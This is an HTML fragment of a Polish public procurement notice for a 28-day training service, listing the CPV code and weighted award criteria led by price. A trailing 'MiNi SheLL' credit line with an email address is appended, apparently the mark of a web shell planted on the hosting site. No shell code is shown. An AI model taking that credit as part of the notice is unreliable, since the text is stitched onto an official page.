-  Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com